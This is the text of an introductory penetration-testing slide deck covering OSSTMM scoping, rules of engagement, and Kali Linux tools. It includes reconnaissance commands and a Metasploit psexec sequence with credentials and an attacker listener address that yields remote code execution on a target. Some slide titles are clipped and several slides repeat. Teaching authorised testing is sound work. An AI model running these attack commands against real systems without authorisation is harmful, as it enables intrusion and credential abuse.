Introduction to Penetration Testing Paul D. Robertson paul@wilkitech.com @compuwar

ilkinson Technology Introduction to Penetration Testing Paul D. Robertson paul@wilkitech.com @compuwar

Speaker Bio Paul D. Robertson Chief Technology Officer and Chief Information Security Officer Wilkinson Technology Services www.wilkitech.com

netration Testing- Definition P-800-115 - Technical Guide to Information Security Testing and Assess Security testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, system, or network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.

Caveats Know the legality of what you re doing before you do it. Get Permission. Just being able to run canned tools isn t usually enough. Worry about 3 rd parties. Always test your tools in a controlled environment. Insurance is a good thing. Evolve.

OSSTMM pen Source Security Testing Methodology Manual ne of many methodologies- none of them canonical ood place to find all the boring stuff and confusing terms

efining A Security Test 1. Define what you want to protect. These are the assets. The protection mechanisms for these assets are the Controls you will test to identify Limitations. 2. Identify the area around the assets which includes the protection mechanisms and the processes or services built around the assets. This is where interaction with assets will take place. This is your engagement zone.

efining A Security Test 3. Define everything outside the engagement zone that you need to keep your assets operational. This may include things you may not be able to directly influence like electricity, food, water, air, stable ground, information, legislation, regulations and things you may be able to work with like dryness, warmth, coolness, clarity, contractors, colleagues, branding, partnerships, and so on. Also count that which keeps the infrastructure operational like processes, protocols, and continued resources. This is your test scope.

fining A Security Test (Cont.) 4. Define how your scope interacts within itself and with the outside. Logically compartmentalize the assets within the scope through the direction of interactions such as inside to outside, outside to inside, inside to inside, department A to department B, etc. These are your vectors. Each vector should ideally be a separate test to keep each compartmentalized test duration short before too much change can occur within the environment.

fining A Security Test (Cont.) 5. Identify what equipment will be needed for each test. Inside each vector, interactions may occur on various levels. These levels may be classified in many ways, however here they have been classified by function as five channels. The channels are Human, Physical, Wireless, Telecommunications, and Data Networks. Each channel must be separately tested for each vector.

fining A Security Test (Cont.) 6. Determine what information you want to learn from the test. Will you be testing interactions with the assets or also the response from active security measures? The test type must be individually defined for each test, however there are six common types identified here as Blind, Double Blind, Gray Box, Double Gray Box, Tandem, and Reversal.

fining A Security Test (Cont.) 7. Assure the security test you have defined is in compliance to the Rules of Engagement, a guideline to assure the process for a proper security test without creating misunderstandings, misconceptions, or false expectations.

Scope The scope is the total possible operating security environment for any interaction with any asset which may include the physical components of security measures as well. The scope is comprised of three classes of which there are five channels: Telecommunications and Data Networks security Channels of the COMSEC class, Physical and Human Security Channels of the PHYSSEC class, and the full spectrum Wireless Security Channel of the SPECSEC class.

Scope Classes are used to define an area of study, investigation, or operation. However, Channels are the specific means of interacting with assets. An asset can be anything that has value to the owner. Assets can be physical property like gold, people, blueprints, laptops, the typical 900 MHz frequency phone signal, and money; or intellectual property such as personnel data, a relationship, a brand, business processes, passwords, and something which is said over the 900 MHz phone signal.

Scope (Cont.) It must be made clear that a security analysis must be restricted to that which is within a type of certainty (not to be confused with risk which is not a certainty but a probability). These restrictions include: 1.Non-events such as a volcano eruption where no volcano exists 2.Non-impact like moonlight through data center window 3. Global-impacting such as a catastrophic meteor impact. While a thorough security audit requires testing all five channels, realistically, tests are conducted and categorized by the required expertise of the Analyst and the required equipment for the audit.

Scope (Cont.) Classes: Physical Security (PHYSSEC) Spectrum Security (SPECSEC) Communications Security (COMSEC)

Scope (Cont.) Physical Security Channels Human: Comprises the human element of communication where interaction is either physical or psychological. Physical: Physical security testing where the channel is both physical and non-electronic in nature. Comprises the tangible element of security where interaction requires physical effort or an energy transmitter to manipulate.

Scope (Cont.) Spectrum Security Channel Wireless: Comprises all electronic communications, signals, and emanations which take place over the known EM spectrum. This includes ELSEC as electronic communications, SIGSEC as signals, and EMSEC which are emanations untethered by cables.

ommon Test Types Blind: No prior target knowledge. Double Blind: No prior target knowledge and no target notification. Gray Box: Limited target knowledge Double Gray Box: Limited target knowledge, target knows timeframe of test. Tandem: Full information on both sides. Reversal: Full information for attacker, no information for defenders.

ules of Engagement What s in scope? What s allowed? NDAs, contracts, get out of jail free cards Required reporting elements. Reporting channels

Testing Passive information collection Active information collection Actively test assets

Tools Toolbox Test Environment

est Environment MSDN/Technet Virtual/Physical Test Software Revisions! Keep old versions!

Toolbox Kali Linux is the main tool we ll be discussing Replacement for Backtrack Linux Designed for Pentesting Debian-based

Kali Linux Lives at http://www.kali.org Actual repository at http.kali.org

Kali Linux Check your checksum after downloading! Linux: sha1sum OSX: shasum Validate SHA1 file with GPG- it s in the docs- next slide Can run live from DVD or USB or install in VM or on hardware Can add persistence to USB installs Dual boot isn t always trivial, neither is EFI boot If you run in a VM, you need a USB-based wireless adapter to attack wireless networks. Kernels are already patched for wireless injection ARM versions available

Kali Linux RTFM! http://docs.kali.org http://docs.kali.org/pdf/kali-book-en.pdf http://forums.kali.org Irc.freenode.net #kali-linux

Kali Linux Caveats: Not really designed for complete newbies Updates routinely break things- snapshot VMs Use pass-through, not NAT for VMs There are more than 300 tools in the distribution- You won t always find information for them all You will be running as root all the time.

Kali Linux Relatively easy to build your own custom version Unlike Backtrack, everything is filesystem standard- no more of that /pentest stuff! Command help sometimes off a bit- just use the command directly, It s in the path.

Kali Linux Relatively easy to build your own custom version from within. Unlike Backtrack, everything is filesystem standard- no more of that /pentest stuff! Command help sometimes off a bit- just use the command directly, It s in the path.

Kali Linux Good Targets: https://www.pentesterlab.com/ http://vulnhub.com/

theharvester Applications->Kali Linux->Information Gathering->OSINT Analysis Example is wrong- no need for./ or.py theharvester d targetdomain b google l 500 Theharvester d targetdomain b linkedin Using b all will sometimes give strange results Can redirect to a file

theharvester theharvester d mydomain.foo b all [+] Emails found: ----------------------- paul@mydomain.foo aul@mydomain.foo paul@mydomain.foo info@mydomain.foo p @mydomain.foo paul@mydomain.foo

theharvester theharvester d mydomain.foo b all [+] Hosts found in search engines: --------------------------------------------- 127.0.0.110:www. mydomain.foo 127.0.0.110:dns1. mydomain.foo 127.0.0.22:dns2. mydomain.foo 127.10.0.110:www. mydomain.foo [+] Virtual hosts ---------------------- 127.0.0.110 otherdomain.bar 127.0.0.110 yetanother.baz 127.0.0.110 otherdomain.baz 127.0.0.110 www.mydomain.foo

theharvester I have found that therarvester finds things in Google that the metasploit auxillary/gather/search_email_collector

DNS dnsrecon d mydomain dnsenum mydomain All allow usage of a wordlist to enumerate potential hostnames. Wordlists live in /usr/share/wordlist rockyou is gzipped Can also use metasploit

DNS In metasploit use auxiliary/gather/enum_dns set DOMAIN=mydomain set ENUM_BRT true set WORDLIST /opt/metasploit/apps/pro/msf3/data/wordlists/namelist.txt set ENUM_AXFR false

OpenVAS Good (not great) vulnerability scanner Forked from Nessus before everything went commercial Run the setup first to set up the admin password and start the engines GSD is difficult to navigate- use GSA if you can Use domain credentials if you can and filter for high and medium vulns Use openvas-nvt-sync before starting up each time

SET se-toolkit 1)Social-Engineering Attacks 2)Fast-Track Penetration Testing 3)Third Party Modules 4)Update the Metasploit Framework 5)Update the Social-Engineer Toolkit 6)Update SET configuration 7)Help, Credits, and About 99) Exit the Social-Engineer Toolkit

SET se-toolkit 1)Spear-Phishing Attack Vectors 2)Website Attack Vectors 3)Infectious Media Generator 4)Create a Payload and Listener 5)Mass Mailer Attack 6)Arduino-Based Attack Vector 7)SMS Spoofing Attack Vector 8)Wireless Access Point Attack Vector 9)QRCode Generator Attack Vector 10)Powershell Attack Vectors 11)Third Party Modules

ern Wi-Fi Cracker GUI tool WPA, WPA2 and WEP Wordlists supported

Metasploit service postgresql start service metasploit start msfconsole

Metasploit use exploit/windows/smb/psexec set LHOST 10.0.0.1 set RHOST 10.0.0.127 set SMBUser victim set SMBPass password exploit

Metasploit service postgresql start service metasploit start msfconsole

Metasploit service postgresql start service metasploit start msfconsole

Teensy 3.0

Teensy 3.0 $20.00 Can act as a USB HID Add teensydurino code to arduino to load sketches Commonly plays as an Apple USB keyboard, which is welcomed by Win*, OSX and most GUI Linuxes

Kautilya http://code.google.com/kautilya Contains many Teensy payloads

Demo Time Assuming everything works

ilkinson Technology Wilkitech paul@wilkitech.com